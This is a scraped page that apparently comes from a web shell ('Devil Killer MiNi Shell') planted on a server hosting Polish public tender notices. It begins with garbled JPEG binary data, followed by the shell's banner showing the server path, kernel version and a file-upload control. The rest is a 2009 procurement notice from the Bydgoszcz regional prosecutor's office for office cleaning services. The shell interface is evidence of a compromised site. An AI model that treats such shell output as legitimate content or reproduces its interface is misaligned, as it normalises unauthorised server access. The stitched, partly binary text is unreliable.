JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/34805-N-2009.html

<p class="kh_header"><b>Bydgoszcz: CODZIENNE SPRZĄTANIE POMIESZCZEŃ
W OBIEKTACH  PROKURATURY OKRĘGOWEJ 
NA TERENIE WOJ. KUJAWSKO - POMORSKIEGO</b><br>
<b>Numer ogłoszenia: 34805 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Bydgoszczy , ul. Farna 6, 85-101 Bydgoszcz, woj. kujawsko-pomorskie, tel. 052 3477516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bydgoszcz.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> CODZIENNE SPRZĄTANIE POMIESZCZEŃ
W OBIEKTACH  PROKURATURY OKRĘGOWEJ 
NA TERENIE WOJ. KUJAWSKO - POMORSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1	Przedmiotem Zamówienia jest świadczenie usługi sprzątania pomieszczeń w obiektach Prokuratury Okręgowej na terenie województwa kujawsko - pomorskiego w sposób sprawny, dokładny i terminowy, z zastosowaniem najnowszej technologii, techniki sprzętu, materiałów i środków czystości o nie niszczącym działaniu na czyszczone elementy pomieszczeń i ich wystrój. 
Wykonawca wykonuje w/wym. czynności: 
	a) własnym sprzętem, 
b) zakupuje na własny koszt: środki czyszczące, dezynfekujące, zapachowe oraz worki na śmieci, ręczniki papierowe, papier toaletowy, mydło w płynie, odświeżacze powietrza, kostki zapachowe do WC wraz z koszykami, woreczki do higieny intymnej, 
c) przy pomocy własnego personelu, którego imienny wykaz przedstawi Zamawiającemu oraz pod własnym nadzorem i kontrolą, 
	d) przy zastosowaniu grafiku sprzątania - Wykonawca zobowiązany jest do zapewnienia i wypełniania grafiku sprzątania w każdej jednostce - kontrola godzin pracy personelu sprzątającego, ewentualne uwagi i zastrzeżenia. 

Wykaz obiektów: 
a)	budynek biurowy Prokuratury Okręgowej w Bydgoszczy ul. Farna 6 - sprzątanie pomieszczeń w obiekcie w godzinach 14.00-19.00, do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - pracownik Wydziału III B.A..  Ilość osób sprzątających: 2 dziennie.
b)	budynek biurowy Prokuratury Rejonowej Bydgoszcz - Północ w Bydgoszczy ul.
Przyrzecze 2-4, Bydgoszcz -sprzątanie pomieszczeń w obiekcie w godz. 14.00-20.00, do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu, w zakresie P.O. pracownik Wydziału III B.A. 
Ilość osób sprzątających:  2 dziennie,
c) budynek biurowy Prokuratury Okręgowej w Bydgoszczy , Wydział V i VI ul. Zamojskiego 16, Bydgoszcz /zamiennie budynek przy ul. Okrzei 10 w Bydgoszczy zawierający 3 piętra po zmianie siedziby Prokuratury Okręgowej w Bydgoszczy od dnia 01 maja 2009 r./. 
 - sprzątanie pomieszczeń w obiekcie w godz. 14.00-20.00,  do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu.  
Ilość osób sprzątających: 1 dziennie,
c)lokal biurowy Prokuratury Rejonowej w Świeciu ul. 10 Lutego 9, Świecie  - sprzątanie pomieszczeń w obiekcie w godz. 14.00-19.00, do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu
Ilość osób sprzątających: 1 dziennie,
d)  budynek biurowy Prokuratury Rejonowej w Tucholi ul. Świecka 95, Tuchola - sprzątanie pomieszczeń w obiekcie w godz. 14.00 - 19.00, do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu
Ilość osób sprzątających: 1 dziennie, 
e) budynek biurowy Prokuratury Rejonowej w Inowrocławiu, ul. Roosevelta 23, Inowrocław - sprzątanie pomieszczeń w obiekcie w godz. 14.00-19.00, do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu
ilość osób sprzątających:  1 dziennie
f)budynek biurowy Prokuratury Rejonowej w Szubinie, ul. Ogrodowa 14, Szubin - sprzątanie pomieszczeń w obiekcie w godz. 14.00-19.00,  do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu
ilość osób sprzątających:  1 dziennie, 
g) budynek biurowy Prokuratury Rejonowej w Nakle ul. Sądowa 1-3, Nakło - sprzątanie pomieszczeń w obiekcie w godz. 14.00-19.00,  do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu
ilość osób sprzątających: 1 dziennie, 
h) budynek biurowy Ośrodka Zamiejscowego Prokuratury Rejonowej w Żninie ul. Sądowa 2, Żnin - sprzątanie pomieszczeń w obiekcie w godz. 14.00-19.00, do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu, ilość osób sprzątających: 1 dziennie, 
i)budynek biurowy Prokuratury Rejonowej w Mogilnie ul. Benedyktyńska 5, Mogilno - sprzątanie pomieszczeń w obiekcie w godz. 14.00-19.00,  do uzyskania pożądanego efektu, za wyjątkiem pomieszczeń: plombowanych, posiadających instalacje alarmowe i monitoringu,  (pomieszczenia te muszą być sprzątnięte  przed wyjściem ostatniego pracownika -wykaz pomieszczeń w załączeniu). Personel sprzątający podpisuje grafik sprzątania pomieszczeń, potwierdzający należyte wykonanie usługi we wszystkich pomieszczeniach, z użyciem środków czyszczących. Osoba nadzorująca ze strony Zamawiającego - kierownik sekretariatu
ilość osób sprzątających: 1 dziennie. 


Wykonawca usługi zobowiązany jest do dostarczenia, co miesiąc wraz z fakturą podpisanych przez osoby wykonujące fizyczne usługi, kart czasu pracy. Karty te zapewnia Wykonawca. Wykonawca przedstawia również wykaz miesięcznego zużycia materiałów. 

Wykonawca zobowiązany jest również do zapewnienia mycia naczyń w przypadku organizowanych szkoleń w budynku Prokuratury Rejonowej Bydgoszcz - Północ w Bydgoszczy przy ul. Przyrzecze 2-4 - wg informacji Zamawiającego. 


Zamawiający dopuszcza w uzasadnionych przypadkach, za wyjątkiem pomieszczeń plombowanych oraz posiadających system alarmowy i monitoringu,  możliwość pracy w dni wolne od pracy, po uprzednim uzgodnieniu z pracownikiem danego obiektu, wyznaczonym do współpracy. 
W przypadku źle wykonanej pracy i konieczności powtórnego jej  wykonania
w dni wolne od pracy nie spowoduje to  podwyższenia wynagrodzenia ustalonego w umowie.
Wykonawca będzie odnotowywał w zeszycie złożonym u pracownika ochrony budynku lub wyznaczonego pracownika danego obiektu, wszelkie widoczne nieprawidłowości w stanie poszczególnych pomieszczeń, urządzeń i umeblowania budynku.
Wykonawca zobowiązany jest w czasie wykonywania usług zapewnić na terenie objętym umową należyty ład, porządek, przestrzeganie przepisów BHP i p.poż. oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług oraz wskutek innych działań osób zatrudnionych przez Wykonawcę.
Wykonawca zobowiązany będzie do zachowania w tajemnicy wszelkich informacji uzyskanych w związku z wykonywaniem ww. usługi.






ZAKRES I CZĘSTOTLIWOŚĆ PRAC OBJĘTYCH ZAMÓWIENIEM


Lp.	

Opis prac	Częstotliwość
		
w tygodniu
(razy)	w ciągu 12 miesięcy
(razy)
I.	SPRZĄTANIE PODSTAWOWE		
	Pomieszczenia biurowe		
1.	Odkurzanie wykładzin dywanowych, dywanów, podłoży twardych, zamiatanie, zmywanie na mokro, usuwanie pajęczyn	5	-
2.	Usuwanie kurzu z mebli, lamp biurowych, sprzętów, szafek, grzejników, parapetów, listew, drzwi, komputerów itp.	5	-
3.	Czyszczenie mebli płynem do konserwacji mebli (pokrywanie emulsją)	1	-
4.	Odkurzanie mebli tapicerowanych, usuwanie kurzu z kratek wentylacyjnych	1	-
5.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków plastikowych	5	-
6.	Przetarcie drzwi i framug, listew osłonowych	1	
7.	Mycie drzwi i framug, listew osłonowych	-	12
8.	Mycie lamp wiszących	-	6
9.	Kontrolowanie zamknięć okien i drzwi we wszystkich pomieszczeniach Zamawiającego	5	-
10.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie
	Korytarze, schody, hole	
1.	Odkurzanie powierzchni podłogowych, zamiatanie, wycieranie na mokro, konserwacja posadzek środkami przeciwpoślizgowymi	5	
2.	Wycieranie balustrad i poręczy	5	
3.	Sprzątanie i mycie wejść i przejść komunikacyjnych	5	
4.	Mycie gablot, listew osłonowych itp. usuwanie kurzu z kratek wentylacyjnych	1	
5.	Mycie drzwi i framug	-	12
6.	Mycie lamp wiszących	-	4
7.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków plastikowych, 	5	-
8.	Usuwanie pajęczyn, czyszczenie popielniczek	5	-
9.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie
	Pomieszczenia socjalne, 	
1.	Wycieranie kurzu z mebli, lamp, sprzętów, szafek, grzejników, parapetów, drzwi, usuwanie pajęczyn	5	-
2.	Sprzątanie i mycie powierzchni podłogowych, zamiatanie, wycieranie na mokro, konserwacja posadzek środkami przeciwpoślizgowymi 	5	-
3.	Przetarcie drzwi i framug, listew osłonowych, usuwanie kurzu z kratek wentylacyjnych	1	-
4.	Sprzątanie oraz mycie kuchenek gazowych, zlewów itp. 	5	-
5.	Mycie wystawionych brudnych naczyń w kuchenkach	5	-
6.	Mycie glazury, lamperii ściennych	1	-
7.	Mycie terakoty	5	-
8.	Mycie drzwi i framug	1	-
9.	Mycie lamp wiszących	-	4
10.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków plastikowych,  czyszczenie popielniczek	5	-
11.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie
	Toalety	
1.	Mycie i dezynfekcja wszystkich urządzeń sanitarnych, usuwanie nalotów, 	5	-
2.	zawieszanie kostek w muszlach, umieszczanie środków zapachowych w pomieszczeniach WC, papieru toaletowego, ręczników papierowych, mydła w płynie, woreczków do higieny intymnej.	niezwłocznie po wyczerpaniu
3.	Mycie glazury	1	-
4.	Mycie terakoty	5	-
5. 	Mycie luster i armatury	5	-
6.	Przetarcie drzwi i framug, usuwanie kurzu z kratek wentylacyjnych	1	-
7.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków plastikowych	5	-
8.	Mycie drzwi i framug, listew osłonowych	-	12
9.	Mycie lamp wiszących	-	4
10.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie
	Piwnice	
1.	Mycie, zamiatanie powierzchni podłogowych w wyznacz. piwnicach oraz korytarzy i schodów  	5	-
2.	Opróżnianie pojemników na śmieci, wynoszenie do miejsc wyznaczonych, wymiana worków plastikowych, usuwanie pajęczyn, usuwanie kurzu z kratek wentylacyjnych	5	-
3.	Przetarcie drzwi  i framug	-	12
4.	Zgłaszanie wszelkich usterek technicznych do wytypowanych pracowników danego obiektu prokuratury	w razie wystąpienia niezwłocznie

WYKAZ OBIEKTÓW PROKURATUR OKRĘGU BYDGOSKIEGO

Lp.	Obiekt	Powierzchnia biurowa (m2)
1	2	3
1	ul. Farna 6/ul. Okrzei 10	606

2	ul. Przyrzecze 2-4	1064
3	ul.Zamojskiego 16	540
4	ul.Ogrodowa 14, Szubin	174
5	ul. Benedyktyńska 5, Mogilno	401
6	ul. Sądowa 1-3, Nakło	352
7	ul.10 Lutego 9, Świecie	317
8	ul. Świecka 68, Tuchola 	210
9	ul.Roosevelta 23, Inowrocław	962
10	ul.Sądowa 2, Żnin	110

RAZEM	
4736.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 3.3.	WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPOSÓB DOKONYWANIA OCENY SPEŁNIENIA TYCH WARUNKÓW
3.3.1.	Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
3.3.1.1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
3.3.1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym, a także osobami zdolnymi do wy?konania Zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.3.1.3.	znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie Zamówienia;
3.3.1.4.	nie podlegają wykluczeniu z Postępowania, zgodnie z art. 24 Ustawy. 

3.3.2. Warunki szczegółowe: 
	a)	Potencjał kadrowy.
Wykonawca musi mieć do dyspozycji osoby legitymujące się doświadczeniem i kwalifikacjami odpowiednimi do stanowisk, jakie zostaną im powierzone, w szczególności określonymi przepisami ustawy. Wykonawca przedstawi w ofercie kandydata na każde stanowisko wymienione w poniższej tabeli.

Lp.	Stanowisko	Wymagana minimalna liczba osób	Wymagane uprawnienia 
1.	Pracownicy sprzątający	12 osób	doświadczenie


3.	Pracownicy nadzoru nad osobami sprzątającymi 	2 osoby	doświadczenie 
 
b)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek określony w pkt 3.3.2.
	c)	Doświadczenie.
Wykonawca musi wykazać, że w okresie ostatnich 3 lat od daty składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał, co najmniej 3 usługi sprzątania w podobnych obiektach (sąd, policja, wojsko, urzędy państwowe). Doświadczenie Wykonawcy w tym zakresie powinno być wykazem dokumentów potwierdzających należyte wykonanie zamówienia (referencje). 
d)	Wykonawca musi posiadać odpowiedni sprzęt oraz środki do świadczenia usług utrzymania czystości w powierzonych obiektach. Wykonawca jest zobowiązany do załączenia do oferty po 1 etykiecie każdego środka czystości, którego używał będzie do wykonywania usługi - dotyczy wszystkich środków wymienionych w pkt 2.1.b Opisu przedmiotu zamówienia - str. 3. 
e)	Potencjał finansowo - ekonomiczny.
Wykonawca musi wykazać:
- posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnej z  przedmiotem niniejszego zamówienia 
f)	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że:
- warunek określony w pkt 3.3.2.  spełniają łącznie wszyscy Wykonawcy

Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w przedmiotowym postępowaniu oświadczeń i dokumentów, wg. formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3.4.	OŚWIADCZENIA I DOKUMENTY JAKIE POWINNI DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW OKREŚLONYCH W PUNKCIE 2
3.4.1.	W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
3.4.1.1.	Warunki szczegółowe określone w punkcie 3.3.2 SIWZ - wraz z ofertą każdy z Wykonawców powinien załączyć:

a.	oświadczenie, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym a także osobami zdolnymi do wykonania Zamówienia lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - załącznik nr 1 do SWIZ, 
b.	 wykaz wykonanych w okresie ostatnich trzech lat usług , odpowiadających swoim rodzajem i wartością usłudze będącej przedmiotem zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumenty potwierdzające, ze usługi te zostały wykonanie zależycie - załącznik nr 6 do SIWZ, 
c.	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności lub pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
3.4.1.2.	Wraz z ofertą każdy z Wykonawców powinien złożyć oświadczenie potwierdzające, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia. Jednocześnie do oferty należy załączyć:
-	     polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
3.4.1.3.	Do oferty każdy z Wykonawców powinien załączyć:
-	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-	aktualną informację z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (dotyczy podmiotów zbiorowych w rozumieniu art. 2 ustawy z dnia 28.10.2002 r. o odpowiedzialności podmiotów zbiorowych Dz. U. z 2002 r., nr 197, poz. 1661 z późn. z m.)
-	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub  że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące prze upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3.5.	INFORMACJA O SPOSOBIE POROZUMIEWANIA SIĘ Z WYKONAWCAMI ORAZ PRZEKAZYWANIA OŚWIADCZEŃ I DOKUMENTÓW.
3.5.1.	Wszelkiego rodzaju oświadczenia, wnioski, zawiadomienia, informacje itp. (dalej, zbiorczo, Korespondencja) Wykonawcy przekazują Zamawiającemu pisemnie. 
3.5.2. Zamawiający dopuszcza składanie Korespondencji za pomocą faksu (na numer 
           wskazany w punkcie 1.6 SIWZ) lub drogą elektroniczną (na adres e-mail wskazany w  
           punkcie 1.6 SIWZ). Korespondencję uważa się za złożoną w terminie, jeżeli jej treść dotarła do Zamawiającego przed upływem terminu i została niezwłocznie      potwierdzona na piśmie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
